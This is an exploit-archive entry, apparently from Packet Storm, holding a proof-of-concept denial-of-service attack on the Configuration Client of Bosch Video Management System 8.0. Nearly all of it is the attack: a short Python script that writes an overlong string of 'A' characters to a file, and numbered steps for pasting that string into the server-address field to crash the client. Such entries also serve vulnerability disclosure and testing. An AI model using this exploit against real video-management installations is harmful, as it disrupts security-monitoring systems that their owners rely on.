Bosch Video Management System 8.0 Denial Of Service

2018-11-15T00:00:00
ID PACKETSTORM:150343
Type packetstorm
Reporter Daniel
Modified 2018-11-15T00:00:00

Description

                                        
                                            `# Exploit Title: Bosch Video Management System 8.0-Configuration Client-Denial of Service (Poc)  
# Discovery by: Daniel  
# Discovery Date: 2018-11-12  
# Software Name: Bosch Video Management System  
# Software Version: 8.0  
# Vendor Homepage: https://www.boschsecurity.com/xc/en/products/management-software/bvms/  
# Software Link: https://la.boschsecurity.com/es/productos/videosystems_1/videosoftware_1/videomanagementsystems_1/boschvideomanagementsyste_8/boschvideomanagementsyste_8_44761  
# Tested on: Windows 10 Pro x64  
  
#Make sure that during the installation of software you installed all the program features available.  
#This PoC was carried out in 'Configuration Client', which is part of 'Bosch Video Management System'.  
  
# Steps to produce the crash:  
# 1.- run: dos.py  
# 2.- Open bosch.txt and copy content to clipboard  
# 2.- Open Configuration Client (Normally the installer creates a direct link in desktop)  
# 3.- Click on 'Connection:' box and select "Address Book"  
# 4.- Copy clipboard in "(Enterprise) Management Server Address:"  
# 5.- write "test" in 'Username'  
# 6.- Write "test" in 'Password'  
# 7.- Click on 'OK'  
# 8.- Crash  
  
  
#!/usr/bin/python  
  
buf = "\x41" * 64  
f = open('bosch.txt', 'w')  
f.write(buf)  
f.close()  
  
  
`